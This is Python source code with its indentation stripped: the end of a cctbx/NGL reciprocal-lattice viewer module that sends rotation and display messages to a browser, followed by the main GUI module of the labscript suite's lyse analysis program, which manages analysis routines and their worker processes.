RotMx = scitbx.math.euler_angles_as_matrix(radangles)
return RotMx
def RotateMxStage(self, rotmx, quietbrowser=True):
if self.cameraPosZ is None:
return
scaleRot = rotmx * self.cameraPosZ
ortrot = scaleRot.as_mat3()
str_rot = str(ortrot)
str_rot = str_rot.replace("(", "")
str_rot = str_rot.replace(")", "")
msg = str_rot + ", quiet\n"
if not quietbrowser:
msg = str_rot + ", verbose\n"
self.AddToBrowserMsgQueue("RotateStage", msg)
def RotateAxisMx(self, vec, theta, quietbrowser=True):
if self.cameraPosZ is None:
return
str_rot = str(list(vec)) + ", " + str(theta)
str_rot = str_rot.replace("[", "")
str_rot = str_rot.replace("]", "")
msg = str_rot + ", quiet\n"
if not quietbrowser:
msg = str_rot + ", verbose\n"
self.AddToBrowserMsgQueue("RotateAxisStage", msg)
def RotateMxComponents(self, rotmx, quietbrowser=True):
if self.cameraPosZ is None:
return
#scaleRot = rotmx * self.cameraPosZ
ortrot = rotmx.as_mat3()
str_rot = str(ortrot)
str_rot = str_rot.replace("(", "")
str_rot = str_rot.replace(")", "")
msg = str_rot + ", quiet\n"
if not quietbrowser:
msg = str_rot + ", verbose\n"
self.AddToBrowserMsgQueue("RotateComponents", msg)
def RotateAxisComponents(self, vec, theta, quietbrowser=True):
if self.cameraPosZ is None:
return
str_rot = str(list(vec)) + ", " + str(theta)
str_rot = str_rot.replace("[", "")
str_rot = str_rot.replace("]", "")
msg = str_rot + ", quiet\n"
if not quietbrowser:
msg = str_rot + ", verbose\n"
self.AddToBrowserMsgQueue("RotateAxisComponents", msg)
def AnimateRotateAxisComponents(self, vec, speed, quietbrowser=True):
if self.cameraPosZ is None:
return
str_rot = str(list(vec)) + ", " + str(speed)
str_rot = str_rot.replace("[", "")
str_rot = str_rot.replace("]", "")
msg = str_rot + ", quiet\n"
if not quietbrowser:
msg = str_rot + ", verbose\n"
self.AddToBrowserMsgQueue("AnimateRotateAxisComponents", msg)
def TranslateHKLpoints(self, h, k, l, mag):
# cast this reciprocal vector into cartesian before messaging NGL to translate our HKL points
#vec = self.miller_array.unit_cell().reciprocal_space_vector((h, k, l))
hkl_vec = flex.vec3_double( [(h,k,l)])
rfracmx = matrix.sqr( self.miller_array.unit_cell().reciprocal().orthogonalization_matrix() )
cartvec = hkl_vec * rfracmx
if cartvec.norm()==0.0 or mag==0.0:
svec = (0, 0, 0)
else:
#cartvec = (mag/cartvec.norm()) * cartvec
cartvec = (-mag*self.scene.renderscale/hkl_vec.norm()) * cartvec
#svec = [cartvec[0][0]*self.scene.renderscale, cartvec[0][1]*self.scene.renderscale, cartvec[0][2]*self.scene.renderscale ]
svec = cartvec[0]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
self.mprint("cartesian translation vector is: " + str(roundoff(svec)), verbose=1)
str_vec = str(svec)
str_vec = str_vec.replace("(", "")
str_vec = str_vec.replace(")", "")
msg = str_vec + "\n"
self.AddToBrowserMsgQueue("TranslateHKLpoints", msg)
def RemoveStageObjects(self):
self.AddToBrowserMsgQueue("RemoveStageObjects")
def DefineHKL_Axes(self, Hstararrowstart, Hstararrowend, Kstararrowstart,
Kstararrowend, Lstararrowstart, Lstararrowend,
Hlabelpos, Klabelpos, Llabelpos):
strdata = ""
strdata += "%s\n\n" %str(Hstararrowstart)
strdata += "%s\n\n" %str(Hstararrowend)
strdata += "%s\n\n" %str(Kstararrowstart)
strdata += "%s\n\n" %str(Kstararrowend)
strdata += "%s\n\n" %str(Lstararrowstart)
strdata += "%s\n\n" %str(Lstararrowend)
strdata += "%s\n\n" %str(Hlabelpos)
strdata += "%s\n\n" %str(Klabelpos)
strdata += "%s\n\n" %str(Llabelpos)
self.AddToBrowserMsgQueue("DefineHKL_Axes", strdata)
def SendCoordinates2Browser(self, positions, colours, radii, ttipids ):
strdata = ""
strdata += "%s\n\n" %roundoff(positions, 2)
strdata += "%s\n\n" %roundoff(colours, 2)
strdata += "%s\n\n" %roundoff(radii, 2)
strdata += "%s" %ttipids
self.AddToBrowserMsgQueue("AddSpheresBin2ShapeBuffer", strdata)
def RenderStageObjects(self):
self.AddToBrowserMsgQueue("RenderStageObjects")
def MakeColourChart(self, ctop, cleft, label, fomlabel, colourgradarray):
msg = "%s\n\n%s\n\n%s\n\n%s\n\n%s" %(ctop, cleft, label, fomlabel, str(colourgradarray) )
self.AddToBrowserMsgQueue("MakeColourChart", msg )
def get_current_datatype(self):
# Amplitudes, Map coeffs, weights, floating points, etc
if self.viewerparams.scene_id is None:
return None
return self.array_info_format_tpl[ self.scene_id_to_array_id(self.viewerparams.scene_id )][1][1]
def onClickColourChart(self):
# if running the GUI show the colour chart selection dialog
self.SendInfoToGUI( { "ColourChart": self.viewerparams.color_scheme,
"ColourPowerScale": self.viewerparams.color_powscale,
"Datatype": self.get_current_datatype(),
"ShowColourMapDialog": 1
} )
def MakeBrowserDataColumnComboBox(self):
datcolstr = ""
for i,lbl in enumerate(self.hkl_scenes_infos):
datcolstr = datcolstr + ",".join(lbl[3]) + "\n" + str(i)
if i < len(self.hkl_scenes_infos)-1:
datcolstr = datcolstr + "\n\n"
datcolstr = datcolstr + "\n\n" + str(self.viewerparams.scene_id)
self.AddToBrowserMsgQueue("MakeBrowserDataColumnComboBox", datcolstr)
ngl_philstr = """
mouse_sensitivity = 0.02
.type = float
bin_opacities = ""
.type = str
tooltip_alpha = 0.80
.type = float
fontsize = 9
.type = int
show_tooltips = none *click hover
.type = choice
camera_type = *orthographic perspective
.type = choice
"""
NGLmaster_phil = libtbx.phil.parse( ngl_philstr )
NGLparams = NGLmaster_phil.fetch().extract()
def reset_NGLsettings():
"""
Reset NGL settings to their default values as specified in the phil definition string
"""
#global NGLmaster_phil
#global ngl_philstr
#global NGLparams
NGLparams = NGLmaster_phil.fetch(source = libtbx.phil.parse( ngl_philstr) ).extract()
def NGLsettings():
"""
Get a global phil parameters object containing some NGL settings
"""
#global NGLparams
return NGLparams
"""
# python2 code
from websocket_server import WebsocketServer
import threading, math
from time import sleep
nc = {}
def new_client(client, server):
nc = client
print "got a new client:", nc
def on_message(client, server, message):
print message
#websocket.enableTrace(True)
server = WebsocketServer(7894, host='127.0.0.1')
server.set_fn_new_client(new_client)
server.set_fn_message_received(on_message)
wst = threading.Thread(target=server.run_forever)
wst.daemon = True
wst.start()
def LoopSendMessages():
x = 0.0
i=0
while server.clients:
nc = server.clients[0]
x += 0.2
alpha = (math.cos(x) +1.0 )/2.0
msg = u"alpha, 2, %f" %alpha
server.send_message(server.clients[0], msg )
r = (math.cos(x) +1.0 )/2.0
g = (math.cos(x+1) +1.0 )/2.0
b = (math.cos(x+2) +1.0 )/2.0
msg = u"colour, 1, %d, %f, %f, %f" %(i,r,g,b)
server.send_message(server.clients[0], msg )
sleep(0.2)
"""
"""
# python3 code
# WS server example
import asyncio
import websockets
async def hello(websocket, path):
while True:
name = await websocket.recv()
print(f"< {name}")
greeting = f"Hello {name}!"
await websocket.send(greeting)
if name=="STOP":
return
await asyncio.sleep(0.2)
start_server = websockets.serve(hello, "localhost", 8765)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
# WS client example
import asyncio
import websockets
async def hello():
uri = "ws://localhost:8765"
async with websockets.connect(uri) as websocket:
while True:
name = input("What's your name?\n" )
await websocket.send(name)
print(f"> {name}")
greeting = await websocket.recv()
print(f"< {greeting}")
asyncio.get_event_loop().run_until_complete(hello())
"""
|
__main__.py
|
from __future__ import division, unicode_literals, print_function, absolute_import # Ease the transition to Python 3
import os
import labscript_utils.excepthook
try:
from labscript_utils import check_version
except ImportError:
raise ImportError('Require labscript_utils > 2.1.0')
check_version('labscript_utils', '2.10.0', '3')
# Splash screen
from labscript_utils.splash import Splash
splash = Splash(os.path.join(os.path.dirname(__file__), 'lyse.svg'))
splash.show()
splash.update_text('importing standard library modules')
# stdlib imports
import sys
import socket
import logging
import threading
import signal
import subprocess
import time
import traceback
import pprint
import ast
# 3rd party imports:
splash.update_text('importing numpy')
import numpy as np
splash.update_text('importing h5_lock and h5py')
import labscript_utils.h5_lock
import h5py
splash.update_text('importing pandas')
import pandas
splash.update_text('importing Qt')
check_version('qtutils', '2.2.2', '3.0.0')
splash.update_text('importing labscript suite modules')
check_version('labscript_utils', '2.12.4', '3')
from labscript_utils.ls_zprocess import ZMQServer, ProcessTree
import zprocess
from labscript_utils.labconfig import LabConfig, config_prefix
from labscript_utils.setup_logging import setup_logging
from labscript_utils.qtwidgets.headerview_with_widgets import HorizontalHeaderViewWithWidgets
from labscript_utils.qtwidgets.outputbox import OutputBox
import labscript_utils.shared_drive as shared_drive
from lyse.dataframe_utilities import (concat_with_padding,
get_dataframe_from_shot,
replace_with_padding)
from qtutils.qt import QtCore, QtGui, QtWidgets
from qtutils.qt.QtCore import pyqtSignal as Signal
from qtutils import inmain_decorator, inmain, UiLoader, DisconnectContextManager
from qtutils.auto_scroll_to_end import set_auto_scroll_to_end
import qtutils.icons
from labscript_utils import PY2
if PY2:
str = unicode
import Queue as queue
else:
import queue
from lyse import LYSE_DIR
process_tree = ProcessTree.instance()
# Set a meaningful name for zlock client id:
process_tree.zlock_client.set_process_name('lyse')
def set_win_appusermodel(window_id):
from labscript_utils.winshell import set_appusermodel, appids, app_descriptions
icon_path = os.path.join(LYSE_DIR, 'lyse.ico')
executable = sys.executable.lower()
if not executable.endswith('w.exe'):
executable = executable.replace('.exe', 'w.exe')
relaunch_command = executable + ' ' + os.path.join(LYSE_DIR, '__main__.py')
relaunch_display_name = app_descriptions['lyse']
set_appusermodel(window_id, appids['lyse'], icon_path, relaunch_command, relaunch_display_name)
@inmain_decorator()
def error_dialog(message):
QtWidgets.QMessageBox.warning(app.ui, 'lyse', message)
@inmain_decorator()
def question_dialog(message):
reply = QtWidgets.QMessageBox.question(app.ui, 'lyse', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)
return (reply == QtWidgets.QMessageBox.Yes)
def scientific_notation(x, sigfigs=4, mode='eng'):
"""Returns a unicode string of the float f in scientific notation"""
times = u'\u00d7'
thinspace = u'\u2009'
hairspace = u'\u200a'
sups = {u'-': u'\u207b',
u'0': u'\u2070',
u'1': u'\xb9',
u'2': u'\xb2',
u'3': u'\xb3',
u'4': u'\u2074',
u'5': u'\u2075',
u'6': u'\u2076',
u'7': u'\u2077',
u'8': u'\u2078',
u'9': u'\u2079'}
prefixes = {
-24: u"y",
-21: u"z",
-18: u"a",
-15: u"f",
-12: u"p",
-9: u"n",
-6: u"\u03bc",
-3: u"m",
0: u"",
3: u"k",
6: u"M",
9: u"G",
12: u"T",
15: u"P",
18: u"E",
21: u"Z",
24: u"Y"
}
if not isinstance(x, float):
raise TypeError('x must be floating point number')
if np.isnan(x) or np.isinf(x):
return str(x)
if x != 0:
exponent = int(np.floor(np.log10(np.abs(x))))
# Only multiples of 10^3
exponent = int(np.floor(exponent / 3) * 3)
else:
exponent = 0
significand = x / 10 ** exponent
pre_decimal, post_decimal = divmod(significand, 1)
digits = sigfigs - len(str(int(pre_decimal)))
significand = round(significand, digits)
result = str(significand)
if exponent:
if mode == 'exponential':
superscript = ''.join(sups.get(char, char) for char in str(exponent))
result += thinspace + times + thinspace + '10' + superscript
elif mode == 'eng':
try:
# If our number has an SI prefix then use it
prefix = prefixes[exponent]
result += hairspace + prefix
except KeyError:
# Otherwise display in scientific notation
superscript = ''.join(sups.get(char, char) for char in str(exponent))
result += thinspace + times + thinspace + '10' + superscript
return result
def get_screen_geometry():
"""Return the a list of the geometries of each screen: each a tuple of
left, top, width and height"""
geoms = []
desktop = qapplication.desktop()
for i in range(desktop.screenCount()):
sg = desktop.screenGeometry(i)
geoms.append((sg.left(), sg.top(), sg.width(), sg.height()))
return geoms
class WebServer(ZMQServer):
def handler(self, request_data):
logger.info('WebServer request: %s' % str(request_data))
if request_data == 'hello':
return 'hello'
elif request_data == 'get dataframe':
# infer_objects() picks fixed datatypes for columns that are compatible with
# fixed datatypes, dramatically speeding up pickling. It is called here
# rather than when updating the dataframe as calling it during updating may
# call it needlessly often, whereas it only needs to be called prior to
# sending the dataframe to a client requesting it, as we're doing now.
app.filebox.shots_model.infer_objects()
return app.filebox.shots_model.dataframe
elif isinstance(request_data, dict):
if 'filepath' in request_data:
h5_filepath = shared_drive.path_to_local(request_data['filepath'])
if isinstance(h5_filepath, bytes):
h5_filepath = h5_filepath.decode('utf8')
if not isinstance(h5_filepath, str):
raise AssertionError(str(type(h5_filepath)) + ' is not str or bytes')
app.filebox.incoming_queue.put(h5_filepath)
return 'added successfully'
elif isinstance(request_data, str):
# Just assume it's a filepath:
app.filebox.incoming_queue.put(shared_drive.path_to_local(request_data))
return "Experiment added successfully\n"
return ("error: operation not supported. Recognised requests are:\n "
"'get dataframe'\n 'hello'\n {'filepath': <some_h5_filepath>}")
class LyseMainWindow(QtWidgets.QMainWindow):
# A signal to show that the window is shown and painted.
firstPaint = Signal()
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
def __init__(self, *args, **kwargs):
QtWidgets.QMainWindow.__init__(self, *args, **kwargs)
self._previously_painted = False
self.closing = False
def closeEvent(self, event):
if self.closing:
return QtWidgets.QMainWindow.closeEvent(self, event)
if app.on_close_event():
self.closing = True
timeout_time = time.time() + 2
self.delayedClose(timeout_time)
event.ignore()
def delayedClose(self, timeout_time):
if not all(app.workers_terminated().values()) and time.time() < timeout_time:
QtCore.QTimer.singleShot(50, lambda: self.delayedClose(timeout_time))
else:
QtCore.QTimer.singleShot(0, self.close)
def event(self, event):
result = QtWidgets.QMainWindow.event(self, event)
if event.type() == QtCore.QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
def paintEvent(self, event):
result = QtWidgets.QMainWindow.paintEvent(self, event)
if not self._previously_painted:
self._previously_painted = True
self.firstPaint.emit()
return result
class AnalysisRoutine(object):
def __init__(self, filepath, model, output_box_port, checked=QtCore.Qt.Checked):
self.filepath = filepath
self.shortname = os.path.basename(self.filepath)
self.model = model
self.output_box_port = output_box_port
self.COL_ACTIVE = RoutineBox.COL_ACTIVE
self.COL_STATUS = RoutineBox.COL_STATUS
self.COL_NAME = RoutineBox.COL_NAME
self.ROLE_FULLPATH = RoutineBox.ROLE_FULLPATH
self.error = False
self.done = False
self.to_worker, self.from_worker, self.worker = self.start_worker()
# Make a row to put into the model:
active_item = QtGui.QStandardItem()
active_item.setCheckable(True)
active_item.setCheckState(checked)
info_item = QtGui.QStandardItem()
name_item = QtGui.QStandardItem(self.shortname)
name_item.setToolTip(self.filepath)
name_item.setData(self.filepath, self.ROLE_FULLPATH)
self.model.appendRow([active_item, info_item, name_item])
self.exiting = False
def start_worker(self):
# Start a worker process for this analysis routine:
worker_path = os.path.join(LYSE_DIR, 'analysis_subprocess.py')
child_handles = process_tree.subprocess(
worker_path,
output_redirection_port=self.output_box_port,
startup_timeout=30,
)
to_worker, from_worker, worker = child_handles
# Tell the worker what script it with be executing:
to_worker.put(self.filepath)
return to_worker, from_worker, worker
def do_analysis(self, filepath):
self.to_worker.put(['analyse', filepath])
signal, data = self.from_worker.get()
if signal == 'error':
return False, data
elif signal == 'done':
return True, data
else:
raise ValueError('invalid signal %s'%str(signal))
@inmain_decorator()
def set_status(self, status):
index = self.get_row_index()
if index is None:
# Yelp, we've just been deleted. Nothing to do here.
return
status_item = self.model.item(index, self.COL_STATUS)
if status == 'done':
status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/tick'))
self.done = True
self.error = False
elif status == 'working':
status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/hourglass'))
self.done = False
self.error = False
elif status == 'error':
status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/exclamation'))
self.error = True
self.done = False
elif status == 'clear':
status_item.setData(None, QtCore.Qt.DecorationRole)
self.done = False
self.error = False
else:
raise ValueError(status)
@inmain_decorator()
def enabled(self):
index = self.get_row_index()
if index is None:
# Yelp, we've just been deleted.
return False
enabled_item = self.model.item(index, self.COL_ACTIVE)
return (enabled_item.checkState() == QtCore.Qt.Checked)
def get_row_index(self):
"""Returns the row index for this routine's row in the model"""
for row in range(self.model.rowCount()):
name_item = self.model.item(row, self.COL_NAME)
fullpath = name_item.data(self.ROLE_FULLPATH)
if fullpath == self.filepath:
return row
def restart(self):
# TODO set status to 'restarting' or an icon or something, and gray out the item?
self.end_child(restart=True)
def remove(self):
"""End the child process and remove from the treeview"""
self.end_child()
index = self.get_row_index()
if index is None:
# Already gone
return
self.model.removeRow(index)
def end_child(self, restart=False):
self.to_worker.put(['quit', None])
timeout_time = time.time() + 2
self.exiting = True
QtCore.QTimer.singleShot(50,
lambda: self.check_child_exited(self.worker, timeout_time, kill=False, restart=restart))
def check_child_exited(self, worker, timeout_time, kill=False, restart=False):
worker.poll()
if worker.returncode is None and time.time() < timeout_time:
QtCore.QTimer.singleShot(50,
lambda: self.check_child_exited(worker, timeout_time, kill, restart))
return
elif worker.returncode is None:
if not kill:
worker.terminate()
app.output_box.output('%s worker not responding.\n'%self.shortname)
timeout_time = time.time() + 2
QtCore.QTimer.singleShot(50,
lambda: self.check_child_exited(worker, timeout_time, kill=True, restart=restart))
return
else:
worker.kill()
app.output_box.output('%s worker killed\n'%self.shortname, red=True)
elif kill:
app.output_box.output('%s worker terminated\n'%self.shortname, red=True)
else:
app.output_box.output('%s worker exited cleanly\n'%self.shortname)
# if analysis was running notify analysisloop that analysis has failed
self.from_worker.put(('error', {}))
if restart:
self.to_worker, self.from_worker, self.worker = self.start_worker()
app.output_box.output('%s worker restarted\n'%self.shortname)
self.exiting = False
class TreeView(QtWidgets.QTreeView):
leftClicked = Signal(QtCore.QModelIndex)
doubleLeftClicked = Signal(QtCore.QModelIndex)
"""A QTreeView that emits a custom signal leftClicked(index) after a left
click on a valid index, and doubleLeftClicked(index) (in addition) on
double click."""
def __init__(self, *args):
QtWidgets.QTreeView.__init__(self, *args)
self._pressed_index = None
self._double_click = False
def mousePressEvent(self, event):
result = QtWidgets.QTreeView.mousePressEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
return result
def leaveEvent(self, event):
result = QtWidgets.QTreeView.leaveEvent(self, event)
self._pressed_index = None
self._double_click = False
return result
def mouseDoubleClickEvent(self, event):
# Ensure our left click event occurs regardless of whether it is the
# second click in a double click or not
result = QtWidgets.QTreeView.mouseDoubleClickEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
self._double_click = True
return result
def mouseReleaseEvent(self, event):
result = QtWidgets.QTreeView.mouseReleaseEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid() and index == self._pressed_index:
self.leftClicked.emit(index)
if self._double_click:
self.doubleLeftClicked.emit(index)
self._pressed_index = None
self._double_click = False
return result
class RoutineBox(object):
COL_ACTIVE = 0
COL_STATUS = 1
COL_NAME = 2
ROLE_FULLPATH = QtCore.Qt.UserRole + 1
# This data (stored in the name item) does not necessarily match
# the position in the model. It will be set just
# prior to sort() being called with this role as the sort data.
# This is how we will reorder the model's rows instead of
# using remove/insert.
ROLE_SORTINDEX = QtCore.Qt.UserRole + 2
def __init__(self, container, exp_config, filebox, from_filebox, to_filebox, output_box_port, multishot=False):
self.multishot = multishot
self.filebox = filebox
self.exp_config = exp_config
self.from_filebox = from_filebox
self.to_filebox = to_filebox
self.output_box_port = output_box_port
self.logger = logging.getLogger('lyse.RoutineBox.%s'%('multishot' if multishot else 'singleshot'))
loader = UiLoader()
loader.registerCustomWidget(TreeView)
self.ui = loader.load(os.path.join(LYSE_DIR, 'routinebox.ui'))
container.addWidget(self.ui)
if multishot:
self.ui.groupBox.setTitle('Multishot routines')
else:
self.ui.groupBox.setTitle('Singleshot routines')
self.model = UneditableModel()
self.header = HorizontalHeaderViewWithWidgets(self.model)
self.ui.treeView.setHeader(self.header)
self.ui.treeView.setModel(self.model)
active_item = QtGui.QStandardItem()
active_item.setToolTip('Whether the analysis routine should run')
status_item = QtGui.QStandardItem()
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/information'))
status_item.setToolTip('The status of this analyis routine\'s execution')
name_item = QtGui.QStandardItem('name')
name_item.setToolTip('The name of the python script for the analysis routine')
self.select_all_checkbox = QtWidgets.QCheckBox()
self.select_all_checkbox.setToolTip('whether the analysis routine should run')
self.header.setWidget(self.COL_ACTIVE, self.select_all_checkbox)
self.header.setStretchLastSection(True)
self.select_all_checkbox.setTristate(False)
self.model.setHorizontalHeaderItem(self.COL_ACTIVE, active_item)
self.model.setHorizontalHeaderItem(self.COL_STATUS, status_item)
self.model.setHorizontalHeaderItem(self.COL_NAME, name_item)
self.model.setSortRole(self.ROLE_SORTINDEX)
self.ui.treeView.resizeColumnToContents(self.COL_ACTIVE)
self.ui.treeView.resizeColumnToContents(self.COL_STATUS)
self.ui.treeView.setColumnWidth(self.COL_NAME, 200)
self.ui.treeView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_set_selected_active = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'set selected routines active', self.ui)
self.action_set_selected_inactive = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'set selected routines inactive', self.ui)
self.action_restart_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/arrow-circle'), 'restart worker process for selected routines', self.ui)
self.action_remove_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/minus'), 'Remove selected routines', self.ui)
self.last_opened_routine_folder = self.exp_config.get('paths', 'analysislib')
self.routines = []
self.connect_signals()
self.analysis = threading.Thread(target = self.analysis_loop)
self.analysis.daemon = True
self.analysis.start()
def connect_signals(self):
self.ui.toolButton_add_routines.clicked.connect(self.on_add_routines_clicked)
self.ui.toolButton_remove_routines.clicked.connect(self.on_remove_selection)
self.model.itemChanged.connect(self.on_model_item_changed)
self.ui.treeView.doubleLeftClicked.connect(self.on_treeview_double_left_clicked)
# A context manager with which we can temporarily disconnect the above connection.
self.model_item_changed_disconnected = DisconnectContextManager(
self.model.itemChanged, self.on_model_item_changed)
self.select_all_checkbox.stateChanged.connect(self.on_select_all_state_changed)
self.select_all_checkbox_state_changed_disconnected = DisconnectContextManager(
self.select_all_checkbox.stateChanged, self.on_select_all_state_changed)
self.ui.treeView.customContextMenuRequested.connect(self.on_treeView_context_menu_requested)
self.action_set_selected_active.triggered.connect(
lambda: self.on_set_selected_triggered(QtCore.Qt.Checked))
self.action_set_selected_inactive.triggered.connect(
lambda: self.on_set_selected_triggered(QtCore.Qt.Unchecked))
self.action_restart_selected.triggered.connect(self.on_restart_selected_triggered)
self.action_remove_selected.triggered.connect(self.on_remove_selection)
self.ui.toolButton_move_to_top.clicked.connect(self.on_move_to_top_clicked)
self.ui.toolButton_move_up.clicked.connect(self.on_move_up_clicked)
self.ui.toolButton_move_down.clicked.connect(self.on_move_down_clicked)
self.ui.toolButton_move_to_bottom.clicked.connect(self.on_move_to_bottom_clicked)
def on_add_routines_clicked(self):
routine_files = QtWidgets.QFileDialog.getOpenFileNames(self.ui,
'Select analysis routines',
self.last_opened_routine_folder,
"Python scripts (*.py)")
if type(routine_files) is tuple:
routine_files, _ = routine_files
if not routine_files:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
routine_files = [os.path.abspath(routine_file) for routine_file in routine_files]
# Save the containing folder for use next time we open the dialog box:
self.last_opened_routine_folder = os.path.dirname(routine_files[0])
self.add_routines([(routine_file, QtCore.Qt.Checked) for routine_file in routine_files])
def add_routines(self, routine_files, clear_existing=False):
"""Add routines to the routine box, where routine_files is a list of
tuples containing the filepath and whether the routine is enabled or
not when it is added. if clear_existing == True, then any existing
analysis routines will be cleared before the new ones are added."""
if clear_existing:
for routine in self.routines[:]:
routine.remove()
self.routines.remove(routine)
# Queue the files to be opened:
for filepath, checked in routine_files:
if filepath in [routine.filepath for routine in self.routines]:
app.output_box.output('Warning: Ignoring duplicate analysis routine %s\n'%filepath, red=True)
continue
routine = AnalysisRoutine(filepath, self.model, self.output_box_port, checked)
self.routines.append(routine)
self.update_select_all_checkstate()
def on_treeview_double_left_clicked(self, index):
# If double clicking on the the name item, open
# the routine in the specified text editor:
if index.column() != self.COL_NAME:
return
name_item = self.model.item(index.row(), self.COL_NAME)
routine_filepath = name_item.data(self.ROLE_FULLPATH)
# get path to text editor
editor_path = self.exp_config.get('programs', 'text_editor')
editor_args = self.exp_config.get('programs', 'text_editor_arguments')
# Get the current labscript file:
if not editor_path:
error_dialog("No editor specified in the labconfig.")
if '{file}' in editor_args:
# Split the args on spaces into a list, replacing {file} with the labscript file
editor_args = [arg if arg != '{file}' else routine_filepath for arg in editor_args.split()]
else:
# Otherwise if {file} isn't already in there, append it to the other args:
editor_args = [routine_filepath] + editor_args.split()
try:
subprocess.Popen([editor_path] + editor_args)
except Exception as e:
error_dialog("Unable to launch text editor specified in %s. Error was: %s" %
(self.exp_config.config_path, str(e)))
def on_remove_selection(self):
self.remove_selection()
def remove_selection(self, confirm=True):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
if not selected_rows:
return
if confirm and not question_dialog("Remove %d routines?" % len(selected_rows)):
return
name_items = [self.model.item(row, self.COL_NAME) for row in selected_rows]
filepaths = [item.data(self.ROLE_FULLPATH) for item in name_items]
for routine in self.routines[:]:
if routine.filepath in filepaths:
routine.remove()
self.routines.remove(routine)
self.update_select_all_checkstate()
def on_model_item_changed(self, item):
if item.column() == self.COL_ACTIVE:
self.update_select_all_checkstate()
def on_select_all_state_changed(self, state):
with self.select_all_checkbox_state_changed_disconnected:
# Do not allow a switch *to* a partially checked state:
self.select_all_checkbox.setTristate(False)
state = self.select_all_checkbox.checkState()
with self.model_item_changed_disconnected:
for row in range(self.model.rowCount()):
active_item = self.model.item(row, self.COL_ACTIVE)
active_item.setCheckState(state)
def on_treeView_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self.ui.treeView)
menu.addAction(self.action_set_selected_active)
menu.addAction(self.action_set_selected_inactive)
menu.addAction(self.action_restart_selected)
menu.addAction(self.action_remove_selected)
menu.exec_(QtGui.QCursor.pos())
def on_set_selected_triggered(self, active):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
for row in selected_rows:
active_item = self.model.item(row, self.COL_ACTIVE)
active_item.setCheckState(active)
self.update_select_all_checkstate()
def on_move_to_top_clicked(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
n = self.model.rowCount()
i_selected = 0
i_unselected = len(selected_rows)
order = []
for i in range(n):
if i in selected_rows:
order.append(i_selected)
i_selected += 1
else:
order.append(i_unselected)
i_unselected += 1
self.reorder(order)
def on_move_up_clicked(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
n = self.model.rowCount()
order = []
last_unselected_index = None
for i in range(n):
if i in selected_rows:
if last_unselected_index is None:
order.append(i)
else:
order.append(i - 1)
order[last_unselected_index] += 1
else:
last_unselected_index = i
order.append(i)
self.reorder(order)
def on_move_down_clicked(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
n = self.model.rowCount()
order = []
last_unselected_index = None
for i in reversed(range(n)):
if i in selected_rows:
if last_unselected_index is None:
order.insert(0, i)
else:
order.insert(0, i + 1)
order[last_unselected_index - n] -= 1
else:
last_unselected_index = i
order.insert(0, i)
self.reorder(order)
def on_move_to_bottom_clicked(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
n = self.model.rowCount()
i_selected = n - len(selected_rows)
i_unselected = 0
order = []
for i in range(n):
if i in selected_rows:
order.append(i_selected)
i_selected += 1
else:
order.append(i_unselected)
i_unselected += 1
self.reorder(order)
def on_restart_selected_triggered(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
name_items = [self.model.item(row, self.COL_NAME) for row in selected_rows]
filepaths = [item.data(self.ROLE_FULLPATH) for item in name_items]
for routine in self.routines:
if routine.filepath in filepaths:
routine.restart()
self.update_select_all_checkstate()
def analysis_loop(self):
while True:
filepath = self.from_filebox.get()
if self.multishot:
assert filepath is None
# TODO: get the filepath of the output h5 file:
# filepath = self.filechooserentry.get_text()
self.logger.info('got a file to process: %s'%filepath)
self.do_analysis(filepath)
def todo(self):
"""How many analysis routines are not done?"""
return len([r for r in self.routines if r.enabled() and not r.done])
def do_analysis(self, filepath):
"""Run all analysis routines once on the given filepath,
which is a shot file if we are a singleshot routine box"""
for routine in self.routines:
routine.set_status('clear')
remaining = self.todo()
error = False
updated_data = {}
while remaining:
self.logger.debug('%d routines left to do'%remaining)
for routine in self.routines:
if routine.enabled() and not routine.done:
break
else:
routine = None
if routine is not None:
self.logger.info('running analysis routine %s'%routine.shortname)
routine.set_status('working')
success, updated_data = routine.do_analysis(filepath)
if success:
routine.set_status('done')
self.logger.debug('success')
else:
routine.set_status('error')
self.logger.debug('failure')
error = True
break
# Race conditions here, but it's only for reporting percent done
# so it doesn't matter if it's wrong briefly:
remaining = self.todo()
total = len([r for r in self.routines if r.enabled()])
done = total - remaining
try:
status_percent = 100*float(done)/(remaining + done)
except ZeroDivisionError:
# All routines got deleted mid-analysis, we're done here:
status_percent = 100.0
self.to_filebox.put(['progress', status_percent, updated_data])
if error:
self.to_filebox.put(['error', None, updated_data])
else:
self.to_filebox.put(['done', 100.0, {}])
